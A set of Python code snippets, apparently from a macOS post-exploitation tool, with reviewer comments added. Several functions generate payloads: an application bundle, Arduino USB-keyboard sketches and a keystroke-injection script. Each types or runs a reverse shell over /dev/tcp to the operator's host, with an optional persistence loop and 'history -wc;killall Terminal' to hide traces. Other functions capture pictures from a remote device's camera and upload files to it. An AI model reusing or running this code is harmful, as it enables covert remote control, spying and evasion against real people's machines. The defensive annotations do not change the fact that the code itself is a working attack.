                        h.info_success("Saved to " + dest + "!")
                    else:
                        h.info_error("Error: " + rp + ": not a directory!")
                else:
                    h.info_error("Local directory: " + rp +
                                 ": does not exist!")
            # Working directory is moved to $HOME/mouse before returning.
            g = os.environ['HOME']
            os.chdir(g + "/mouse")

        elif cmd_data['args'].split()[0] == "start":
            # The reply to "record" is discarded.
            cmd_data['args'] = "record"
            h.info_general("Starting record...")
            session.send_command(cmd_data)
Esempio n. 18
    def run(self, server):
        """Prompt for options and assemble an application bundle around a script.

        Reads a shell name, an icon path, a persistence choice and an output
        path from the operator, copies the template bundle data/app/payload.app
        to the output path, moves the icon into it and writes a bash script
        holding one command line built from the answers plus server.host and
        server.port.
        """
        # The outer loop runs once: both persistence branches end in `break`.
        while 1:
            shell = input(h.info_general_raw("Target shell: ")).strip(" ")
            # NOTE(review): the first icon prompt sits inside this retry loop,
            # so when the first shell answer is non-empty `icon` is still
            # unbound at the `while icon == ""` test below.
            while shell == "":
                shell = input(h.info_general_raw("Target shell: ")).strip(" ")
                icon = input(
                    h.info_general_raw("Application icon: ")).strip(" ")
            while icon == "":
                icon = input(
                    h.info_general_raw("Application icon: ")).strip(" ")
            persistence = input(h.info_question_raw(
                "Make persistent? (y/n): ")).strip(" ").lower()
            # The command line redirects the chosen shell's stdout/stderr to
            # /dev/tcp/<server.host>/<server.port> and takes stdin from it.
            if persistence == "y":
                shell_command = "while true; do $(" + shell + " &> /dev/tcp/" + str(
                    server.host) + "/" + str(
                        server.port) + " 0>&1); sleep 5; done & "
                break
            else:
                shell_command = shell + " &> /dev/tcp/" + str(
                    server.host) + "/" + str(server.port) + " 0>&1;"
                break
        # NOTE(review): for defenders the visible traces of the generated
        # script are a shell with /dev/tcp redirections, `history -wc`, and
        # Terminal being killed.
        shell_command += "history -wc;killall Terminal"
        path = input(h.info_general_raw("Output path: ")).strip(" ")
        if path == "":
            path = "payload.app"
        if os.path.isdir(path):
            # exists() cannot be false right after a true isdir().
            if os.path.exists(path):
                if path[-1] == "/":
                    payload_save_path = path + "payload.app"
                else:
                    payload_save_path = path + "/payload.app"
            else:
                h.info_error("Local directory: " + path + ": does not exist!")
                # NOTE(review): bare `exit` is a name lookup, not a call; the
                # function keeps going and payload_save_path stays unbound.
                exit
        else:
            direct = os.path.split(path)[0]
            if direct == "":
                direct = "."
            else:
                pass
            if os.path.exists(direct):
                if os.path.isdir(direct):
                    payload_save_path = path
                else:
                    h.info_error("Error: " + direct + ": not a directory!")
                    exit
            else:
                h.info_error("Local directory: " + direct +
                             ": does not exist!")
                exit
        h.info_general("Creating payload...")
        # NOTE(review): the typed path and icon are concatenated unquoted into
        # command lines that os.system() hands to a shell on the local machine.
        os.system("cp -r data/app/payload.app " + path + " > /dev/null")
        os.system("mv " + icon + " " + path +
                  "/Contents/Resources/payload.icns > /dev/null")
        payload = """\
#! /usr/bin/env bash
""" + shell_command
        h.info_general("Saving to " + path + "...")
        # NOTE(review): the script text is written to payload_save_path, while
        # chmod below targets <path>/Contents/MacOS/payload.sh; those differ
        # in every branch above.
        f = open(payload_save_path, "w")
        f.write(payload)
        f.close()
        h.info_success("Saved to " + path + "!")
        os.system("chmod +x " + path + "/Contents/MacOS/payload.sh")
Esempio n. 19
	def run(self,session,cmd_data):
		"""Request a picture over the session and save the returned bytes locally.

		cmd_data['args'] is expected to be "<front|back> <local_path>". The first
		token is turned into a boolean (False for "back", True otherwise) and the
		command is sent with session.send_command(). When the JSON reply has a
		'success' key, int(reply["size"]) bytes are read with
		session.sock_receive_data() and written to disk.

		If <local_path> is an existing directory the file is written as
		picture.jpg inside it; otherwise <local_path> is used as the file name
		and only its parent directory is validated. Every path returns None and
		failures are reported through h.info_error().

		NOTE(review): going by the "front"/"back" argument and the status text
		this presumably triggers a camera capture on the remote device; that
		side is not visible in this snippet. On the device, the observable would
		be camera access by a process with no reason to use the camera.
		"""
		# Need at least "<front|back> <path>"; anything else prints the usage text.
		if len(cmd_data['args'].split()) < 2 or (cmd_data['args'].split()[0] != "front" and cmd_data['args'].split()[0] != "back"):
			print(self.usage)
			return
		
		# Second token is the local destination, first token the selector.
		dest = cmd_data['args'].split()[1]
		cmd_data['args'] = cmd_data['args'].split()[0]
		if os.path.isdir(dest):
			# os.path.isdir() is only true for an existing path, so the
			# "does not exist" branch paired with this test cannot run.
			if os.path.exists(dest):
				# The selector is sent as a boolean: False = "back", True = "front".
				if cmd_data['args'] == "back":
					cmd_data['args'] = False
				else:
					cmd_data['args'] = True
				h.info_general("Taking picture...")
				try:
					response = json.loads(session.send_command(cmd_data))
					if 'success' in response:
						# NOTE(review): the read length comes straight from the
						# peer's reply; no upper bound is applied here.
						size = int(response["size"])
						data = session.sock_receive_data(size)
						# NOTE(review): no context manager, so the handle is
						# not closed if write() raises.
						f = open(os.path.join(dest,'picture.jpg'),'wb')
						f.write(data)
						f.close()
					else:
						# Both branches report the same message; the 'error'
						# value itself is never shown.
						if 'error' in response:
							h.info_error("Failed to take picture!")
							return
						else:
							h.info_error("Failed to take picture!")
							return
				except:
					# Bare except: JSON, key, socket and file errors all end up
					# with the same generic message.
					h.info_error("Failed to take picture!")
					return
				# The file is already on disk here; the trailing-slash test only
				# decides how the path is printed, and the sleep only separates
				# the two status lines.
				if dest[-1] == "/":
					h.info_general("Saving to "+dest+"picture.jpg...")
					time.sleep(1)
					h.info_success("Saved to "+dest+"picture.jpg!")
				else:
					h.info_general("Saving to "+dest+"/picture.jpg...")
					time.sleep(1)
					h.info_success("Saved to "+dest+"/picture.jpg!")
			else:
				h.info_error("Local directory: "+dest+": does not exist!")
		else:
			# dest is treated as a file name: validate its parent directory,
			# using "." when dest has no directory component.
			rp = os.path.split(dest)[0]
			if rp == "":
				rp = "."
			else:
				pass
			if os.path.exists(rp):
				if os.path.isdir(rp):
					# Split dest again into directory (pr) and file name (rp);
					# os.path.join(pr, rp) below puts them back together.
					pr = os.path.split(dest)[0]
					rp = os.path.split(dest)[1]
					if cmd_data['args'] == "back":
						cmd_data['args'] = False
					else:
						cmd_data['args'] = True
					h.info_general("Taking picture...")
					try:
						response = json.loads(session.send_command(cmd_data))
						if 'success' in response:
							# NOTE(review): peer-supplied length, unbounded (as above).
							size = int(response["size"])
							data = session.sock_receive_data(size)
							f = open(os.path.join(pr,rp),'wb')
							f.write(data)
							f.close()
						else:
							if 'error' in response:
								h.info_error("Failed to take picture!")
								return
							else:
								h.info_error("Failed to take picture!")
								return
					except:
						# Same catch-all as in the directory branch.
						h.info_error("Failed to take picture!")
						return
					# Cosmetic pause; the write has already happened.
					h.info_general("Saving to "+dest+"...")
					time.sleep(1)
					h.info_success("Saved to "+dest+"!")
				else:
					h.info_error("Error: "+rp+": not a directory!")
			else:
				h.info_error("Local directory: "+rp+": does not exist!")
Esempio n. 20
    def run(self, server):
        """Interactively generate an Arduino sketch that types a shell command.

        Prompts for a shell name and a persistence choice, builds a bash
        command line that redirects the shell's I/O to
        /dev/tcp/<server.host>/<server.port>, appends
        "history -wc;killall Terminal", embeds the result in a Keyboard.h
        sketch and writes the sketch to the chosen output file.

        Python 2 code (raw_input). Returns None.

        Defensive relevance: the command line that the generated sketch types
        always contains the substrings "/dev/tcp/", "0>&1" and
        "history -wc;killall Terminal" (all built below), which makes them
        usable strings for shell/process command-line telemetry. The board
        acts as a USB keyboard via Keyboard.h, so the relevant controls sit on
        the host (screen lock, policy on newly attached HID devices).
        """
        # Both branches break, so this loop body runs exactly once.
        while 1:
            shell = raw_input(h.info_general_raw("Target Shell: ")).strip(" ")
            persistence = raw_input(
                h.info_question_raw("Make Persistent? (y/n): ")).strip(
                    " ").lower()
            if persistence == "y":
                # Background loop that re-runs the redirected shell every 5 seconds.
                shell_command = "while true; do $(" + shell + " &> /dev/tcp/" + str(
                    server.host) + "/" + str(
                        server.port) + " 0>&1); sleep 5; done & "
                break
            else:
                # Single invocation of the redirected shell.
                shell_command = shell + " &> /dev/tcp/" + str(
                    server.host) + "/" + str(server.port) + " 0>&1;"
                break
        # Appended in both modes: writes then clears the shell history and
        # kills Terminal -- presumably to reduce visible traces.
        shell_command += "history -wc;killall Terminal"
        path = raw_input(h.info_general_raw("Output File: ")).strip(" ")
        # Switch to the directory recorded in OLDPWD before resolving the
        # output path; raises KeyError when OLDPWD is not set.
        w = os.environ['OLDPWD']
        os.chdir(w)
        if os.path.isdir(path):
            # isdir() implies exists(), so the else branch below is unreachable.
            if os.path.exists(path):
                # NOTE(review): path[:-1] is the path without its last
                # character, not the last character itself, so this test is
                # true only when that prefix is exactly "/".
                if path[:-1] == "/":
                    payload_save_path = path + "payload.ino"
                else:
                    payload_save_path = path + "/payload.ino"
            else:
                h.info_error("Local directory: " + path + ": does not exist!")
                # Bare name, not a call: execution continues after this line.
                exit
        else:
            # NOTE(review): for a bare file name os.path.split() yields "" and
            # os.path.exists("") is False, so such a path lands in the
            # "does not exist" branch.
            direct = os.path.split(path)[0]
            if os.path.exists(direct):
                if os.path.isdir(direct):
                    payload_save_path = path
                else:
                    h.info_error("Error: " + direct + ": not a directory!")
                    # No-op (see above); payload_save_path stays unbound.
                    exit
            else:
                h.info_error("Local directory: " + direct +
                             ": does not exist!")
                # No-op (see above); payload_save_path stays unbound.
                exit
        # Sketch text: presses KEY_LEFT_GUI + space, types "terminal", Return,
        # then the command line built above, Return. shell_command is
        # concatenated between the escaped quotes as-is.
        payload = """\
#include "Keyboard.h"

void typeKey(uint8_t key)
{
  Keyboard.press(key);
  delay(50);
  Keyboard.release(key);
}

void setup()
{
  Keyboard.begin();

  delay(500);

  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press(' ');
  Keyboard.releaseAll();

  delay(500);
  Keyboard.print(F("terminal"));

  delay(500);
  typeKey(KEY_RETURN);

  delay(500);
  Keyboard.print(F(\"""" + shell_command + """\"));

  delay(500);
  typeKey(KEY_RETURN);

  Keyboard.end();
}

void loop() {}"""
        # After any of the error branches above payload_save_path is unbound,
        # so this line raises instead of writing a file.
        h.info_general("Saving to " + payload_save_path + "...")
        f = open(payload_save_path, "w")
        f.write(payload)
        f.close()
        h.info_success("Saved to " + payload_save_path + "!")
        # Move the working directory to $HOME/mouse afterwards.
        g = os.environ['HOME']
        os.chdir(g + "/mouse")
Esempio n. 21
	def run(self,server):
		"""Interactively generate a keystroke-injection script (DELAY/STRING/ENTER text).

		Prompts for a shell name (default "sh") and a persistence choice,
		builds a bash command line that redirects the shell's I/O to
		/dev/tcp/<server.host>/<server.port>, appends
		"history -wc;killall Terminal", places it on a STRING line of the
		script and writes the script to the chosen path (default
		"payload.txt").

		On a path error the function reports it, changes directory to
		$HOME/mouse, waits for Enter, creates a ".nopayload" marker file there
		and returns None.

		Defensive relevance: the typed command line always contains
		"/dev/tcp/", "0>&1" and "history -wc;killall Terminal" (built below),
		which are usable strings for shell/process command-line telemetry.
		"""
		# Both branches break, so this loop body runs exactly once.
		while 1:
			shell = input(h.info_general_raw("Target shell: ")).strip(" ")
			if shell == "":
				shell = "sh"
			persistence = input(h.info_question_raw("Make persistent? (y/n): ")).strip(" ").lower()
			if persistence == "y":
				# Background loop that re-runs the redirected shell every 5 seconds.
				shell_command = "while true; do $("+shell+" &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1); sleep 5; done & "
				break
			else:
				# Single invocation of the redirected shell.
				shell_command = shell+" &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1;"
				break
		# Appended in both modes: writes then clears the shell history and
		# kills Terminal -- presumably to reduce visible traces.
		shell_command += "history -wc;killall Terminal"
		path = input(h.info_general_raw("Output path: ")).strip(" ")
		if path == "":
			path = "payload.txt"
		# Resolve the output path from the directory recorded in OLDPWD;
		# raises KeyError when OLDPWD is not set.
		w = os.environ['OLDPWD']
		os.chdir(w)
		if os.path.isdir(path):
			# isdir() implies exists(), so the else branch below is unreachable.
			if os.path.exists(path):
				if path[-1] == "/":
					payload_save_path = path + "payload.txt"
				else:
					payload_save_path = path + "/payload.txt"
			else:
				# NOTE(review): `dest` is not defined in this function; this
				# line would raise NameError if the branch could be reached.
				h.info_error("Local directory: "+dest+": does not exist!")
				g = os.environ['HOME']
				os.chdir(g + "/mouse")
				input("Press enter to continue...").strip(" ")
				# Marker file created in the current directory ($HOME/mouse).
				os.system("touch .nopayload")
				return
		else:
			# path is treated as a file name: validate its parent directory,
			# using "." when it has no directory component.
			direct = os.path.split(path)[0]
			if direct == "":
				direct = "."
			else:
				pass
			if os.path.exists(direct):
				if os.path.isdir(direct):
					payload_save_path = path
				else:
					h.info_error("Error: "+direct+": not a directory!")
					g = os.environ['HOME']
					os.chdir(g + "/mouse")
					input("Press enter to continue...").strip(" ")
					os.system("touch .nopayload")
					return
			else:
				h.info_error("Local directory: "+direct+": does not exist!")
				g = os.environ['HOME']
				os.chdir(g + "/mouse")
				input("Press enter to continue...").strip(" ")
				os.system("touch .nopayload")
				return
		h.info_general("Creating payload...")
		# Script text: COMMAND SPACE, the word "terminal", ENTER, then the
		# command line built above on a STRING line, ENTER, with 500-unit
		# DELAY lines in between.
		payload = """\
DELAY 500
COMMAND SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 500
STRING """+shell_command+"""
DELAY 500
ENTER
DELAY 500"""
		h.info_general("Saving to " + payload_save_path + "...")
		# NOTE(review): no context manager, so the handle is not closed if
		# write() raises.
		f = open(payload_save_path,"w")
		f.write(payload)
		f.close()
		h.info_success("Saved to " + payload_save_path + "!")
		# Move the working directory to $HOME/mouse afterwards.
		g = os.environ['HOME']
		os.chdir(g + "/mouse")
Esempio n. 22
    def run(self, session, cmd_data):
        """Upload one local file to a path on the remote end of the session.

        cmd_data['args'] must hold exactly two paths, "<local_path>
        <remote_path>", separated by a space that is not preceded by a
        backslash. The local path must exist and must not be a directory.

        The remote path is probed twice through session.send_command(): a
        "[[ -d ... ]]" shell test and a "stat" command. If it is a directory
        the file is uploaded into it under its local name; otherwise the
        parent of the remote path is stat-ed and the file is uploaded there
        under the remote file name.

        Python 2 code (print statements). Returns None on every path.
        """
        if not cmd_data['args']:
            print self.usage
            return
        else:
            # Split on spaces that are not escaped with a backslash.
            paths = re.split(r'(?<!\\) ', cmd_data['args'].rstrip())
            if len(paths) < 2:
                print "Usage: upload <local_path> <remote_path>"
                return

            if len(paths) > 2:
                print "Usage: upload <local_path> <remote_path>"
                return

            # local_dir is computed but not used further down.
            local_dir = os.path.split(paths[0])[0]
            local_file = os.path.split(paths[0])[1]

            remote_dir = os.path.split(paths[1])[0]
            remote_file = os.path.split(paths[1])[1]

            # The local source must exist and must be a file, not a directory.
            if os.path.exists(paths[0]):
                if os.path.isdir(paths[0]):
                    h.info_error("Error: " + paths[0] + ": not a file!")
                    return
                else:
                    pass
            else:
                h.info_error("Local file: " + paths[0] + ": does not exist!")
                return

            raw = paths[1]
            # NOTE(review): raw is concatenated into shell text without
            # quoting, so a path containing whitespace or shell metacharacters
            # is not tested as a single path.
            payload = """if [[ -d """ + raw + """ ]]
            then
            echo 0
            fi"""
            # dchk is "0\n" when the shell test above succeeded; chk is the
            # reply to the "stat" command for the same path.
            dchk = session.send_command({"cmd": "", "args": payload})
            chk = session.send_command({"cmd": "stat", "args": raw})
            if dchk == "0\n":
                # A reply starting with "stat" is treated as a failure --
                # presumably the tool's own error prefix; verify against the
                # agent side.
                if chk[:4] != "stat":
                    h.info_general("Uploading " + local_file + "...")
                    session.upload_file(paths[0], raw, local_file)
                    # The upload has already been issued; the trailing-slash
                    # test only decides how the path is printed and the sleep
                    # only separates the two status lines.
                    if raw[-1:] == "/":
                        h.info_general("Saving to " + raw + "" + local_file +
                                       "...")
                        time.sleep(1)
                        h.info_success("Saved to " + raw + "" + local_file +
                                       "...")
                    else:
                        h.info_general("Saving to " + raw + "/" + local_file +
                                       "...")
                        time.sleep(1)
                        h.info_success("Saved to " + raw + "/" + local_file +
                                       "...")
                else:
                    h.info_error("Remote directory: " + raw +
                                 ": does not exist!")
            else:
                # Remote path is not a directory: check its parent instead and
                # upload under the remote file name.
                schk = session.send_command({
                    "cmd": "stat",
                    "args": remote_dir
                })
                if schk[:4] != "stat":
                    h.info_general("Uploading " + local_file + "...")
                    session.upload_file(paths[0], remote_dir, remote_file)
                    h.info_general("Saving to " + raw + "...")
                    time.sleep(1)
                    h.info_success("Saved to " + raw + "...")
                else:
                    h.info_error("Remote directory: " + remote_dir +
                                 ": does not exist!")
Esempio n. 23
    def run(self, server):
        """Interactively generate an Arduino sketch that types a shell command.

        Prompts for a shell name (default "sh") and a persistence choice,
        builds a bash command line that redirects the shell's I/O to
        /dev/tcp/<server.host>/<server.port>, appends
        "history -wc;killall Terminal", embeds the result in a Keyboard.h
        sketch and writes the sketch to the chosen path (default
        "payload.ino").

        On a path error the function reports it, waits for Enter, creates a
        ".nopayload" marker file in the current directory and returns None.

        Defensive relevance: the command line that the generated sketch types
        always contains the substrings "/dev/tcp/", "0>&1" and
        "history -wc;killall Terminal" (all built below), which makes them
        usable strings for shell/process command-line telemetry. The board
        acts as a USB keyboard via Keyboard.h, so the relevant controls sit on
        the host (screen lock, policy on newly attached HID devices).
        """
        # Both branches break, so this loop body runs exactly once.
        while 1:
            shell = input(h.info_general_raw("Target shell: ")).strip(" ")
            if shell == "":
                shell = "sh"
            persistence = input(h.info_question_raw(
                "Make persistent? (y/n): ")).strip(" ").lower()
            if persistence == "y":
                # Background loop that re-runs the redirected shell every 5 seconds.
                shell_command = "while true; do $(" + shell + " &> /dev/tcp/" + str(
                    server.host) + "/" + str(
                        server.port) + " 0>&1); sleep 5; done & "
                break
            else:
                # Single invocation of the redirected shell.
                shell_command = shell + " &> /dev/tcp/" + str(
                    server.host) + "/" + str(server.port) + " 0>&1;"
                break
        # Appended in both modes: writes then clears the shell history and
        # kills Terminal -- presumably to reduce visible traces.
        shell_command += "history -wc;killall Terminal"
        path = input(h.info_general_raw("Output path: ")).strip(" ")
        if path == "":
            path = "payload.ino"
        if os.path.isdir(path):
            # isdir() implies exists(), so the else branch below is unreachable.
            if os.path.exists(path):
                if path[-1] == "/":
                    payload_save_path = path + "payload.ino"
                else:
                    payload_save_path = path + "/payload.ino"
            else:
                h.info_error("Local directory: " + path + ": does not exist!")
                input("Press enter to continue...").strip(" ")
                # Marker file created in the current working directory.
                os.system("touch .nopayload")
                return
        else:
            # path is treated as a file name: validate its parent directory,
            # using "." when it has no directory component.
            direct = os.path.split(path)[0]
            if direct == "":
                direct = "."
            else:
                pass
            if os.path.exists(direct):
                if os.path.isdir(direct):
                    payload_save_path = path
                else:
                    h.info_error("Error: " + direct + ": not a directory!")
                    input("Press enter to continue...").strip(" ")
                    os.system("touch .nopayload")
                    return
            else:
                h.info_error("Local directory: " + direct +
                             ": does not exist!")
                input("Press enter to continue...").strip(" ")
                os.system("touch .nopayload")
                return
        h.info_general("Creating payload...")
        # Sketch text: presses KEY_LEFT_GUI + space, types "terminal", Return,
        # then the command line built above, Return. shell_command is
        # concatenated between the escaped quotes as-is.
        payload = """\
#include "Keyboard.h"

void typeKey(uint8_t key)
{
  Keyboard.press(key);
  delay(50);
  Keyboard.release(key);
}

void setup()
{
  Keyboard.begin();

  delay(500);

  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press(' ');
  Keyboard.releaseAll();

  delay(500);
  Keyboard.print(F("terminal"));

  delay(500);
  typeKey(KEY_RETURN);

  delay(500);
  Keyboard.print(F(\"""" + shell_command + """\"));

  delay(500);
  typeKey(KEY_RETURN);

  Keyboard.end();
}

void loop() {}"""
        h.info_general("Saving to " + payload_save_path + "...")
        # NOTE(review): no context manager, so the handle is not closed if
        # write() raises.
        f = open(payload_save_path, "w")
        f.write(payload)
        f.close()
        h.info_success("Saved to " + payload_save_path + "!")